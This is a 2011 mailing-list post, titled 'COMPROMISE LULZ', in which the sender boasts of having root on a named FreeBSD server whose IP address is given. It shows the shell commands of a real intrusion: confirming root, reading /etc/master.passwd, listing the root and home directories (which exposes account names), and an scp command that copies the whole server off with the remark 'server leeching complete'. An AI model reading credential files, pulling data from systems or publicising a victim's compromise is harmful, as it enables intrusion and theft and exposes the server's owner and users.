Message-Id: <20111120085720.601E865E164@mail.vmail.me>
Date: Sun, 20 Nov 2011 09:57:20 +0100 (CET)
From: airwalker@...il.me
To: full-disclosure@...ts.grok.org.uk
Subject: COMPROMISE LULZ
"I set fire to the rain"
#uname -a;id;
FreeBSD castle.alfa-inet.net 7.2-RELEASE-p8 FreeBSD 7.2-RELEASE-p8 #6: Sat Apr 23 12:52:20 EEST 2011 root@...ecat.alter.org.ua:/usr/src/sys/i386/compile/CAT_v14c i386
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),80(www)
#cat /etc/master.passwd
castle.alfa-inet.net [62.205.132.50]
ls -la /root/
total 7796
drwxr-xr-x 9 root wheel 1024 Nov 7 01:55 ./
drwxr-xr-x 24 root wheel 512 Apr 21 2011 ../
-rw-r--r-- 2 root wheel 786 Feb 24 2008 .cshrc
-rw------- 1 root wheel 18 Nov 18 18:01 .history
-rw------- 1 root wheel 1133 Jul 28 2009 .joe_state
-rw-r--r-- 1 root wheel 143 Feb 24 2008 .k5login
-rw------- 1 root wheel 686 Nov 7 21:27 .lesshst
drwx------ 2 root wheel 512 Nov 7 02:45 .links/
-rw-r--r-- 1 root wheel 293 Feb 24 2008 .login
drwxr-xr-x 3 root wheel 512 Oct 17 14:54 .mc/
-rw------- 1 root wheel 3111 Sep 30 2009 .mysql_history
-rw-r--r-- 2 root wheel 253 Feb 24 2008 .profile
-rw------- 1 root wheel 1024 Aug 20 2008 .rnd
drwx------ 2 root wheel 512 Jul 8 17:09 .ssh/
-rw-r--r-- 1 root wheel 3711 Jun 7 2008 .tcshrc
drwxr-xr-x 8 root wheel 512 Jan 23 2009 dhcp_probe-1.0.7/
-rw-r--r-- 1 root wheel 176501 Jan 23 2009 dhcp_probe-1.0.7.tar.gz
drwxr-xr-x 8 root wheel 1024 Jan 23 2009 dhcp_probe-1.2.0/
-rw-r--r-- 1 root wheel 186905 Jan 23 2009 dhcp_probe-1.2.0.tar.gz
drwxr-xr-x 8 root wheel 1024 Jan 23 2009 dhcp_probe-1.2.1/
-rw-r--r-- 1 root wheel 190410 Jan 23 2009 dhcp_probe-1.2.1.tar.gz
drwxr-xr-x 8 root wheel 1024 Jan 23 2009 dhcp_probe-1.2.2/
-rw-r--r-- 1 root wheel 200192 Jan 23 2009 dhcp_probe-1.2.2.tar.gz
-rw-r--r-- 1 root wheel 3144316 Jun 22 2009 triar@....214.215.216
ls -la /home
total 152
drwxr-xr-x 23 root wheel 512 Oct 16 13:06 ./
drwxr-xr-x 24 root wheel 512 Apr 21 2011 ../
drwxrwxr-x 2 root operator 512 Jun 9 2010 .snap/
drwxr-xr-x 3 admin wheel 512 Mar 11 2008 admin/
drwxr-xr-x 3 allenport allenport 512 Jul 9 2009 allenport/
drwxr-xr-x 25 alter alter 3584 Nov 4 23:53 alter/
drwxr-xr-x 2 root wheel 28160 Nov 20 05:15 bkp/
drwxrwxr-x 4 root ceo 512 Nov 4 2009 ceo/
drwxr-xr-x 2 count count 512 Dec 1 2009 count/
drwxr-xr-x 3 druid druid 512 Feb 6 2011 druid/
drwxr-xr-x 4 elf elf 512 Aug 21 2010 elf/
drwxr-xr-x 4 embar 1013 512 Aug 24 2010 embar/
drwxr-xr-x 2 ezzh ezzh 512 Mar 11 2011 ezzh/
drwxr-xr-x 2 fatipon fatipon 512 Oct 16 17:03 fatipon/
drwxr-xr-x 2 gel gel 512 Jan 15 2011 gel/
drwxr-xr-x 2 info staff 512 Oct 15 14:56 info/
drwxr-xr-x 5 kesha kesha 512 Apr 25 2011 kesha/
drwxr-xr-x 4 maxtul maxtul 512 Oct 10 17:33 maxtul/
drwxr-xr-x 2 phoenix phoenix 512 Jul 27 2010 phoenix/
drwxr-xr-x 5 root wheel 512 Nov 4 2009 seo/
drwxr-xr-x 3 skat skat 512 Oct 7 2010 skat/
drwxrwxrwx 3 root wheel 3072 Nov 9 18:19 traf_check/
drwxr-xr-x 12 triar triar 1024 Nov 20 09:43 triar/
scp -r root@...tle.alfa-inet.net:* .
server leeching complete...
[http://castle.alfa-inet.net/hurricane2.0.mp3]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/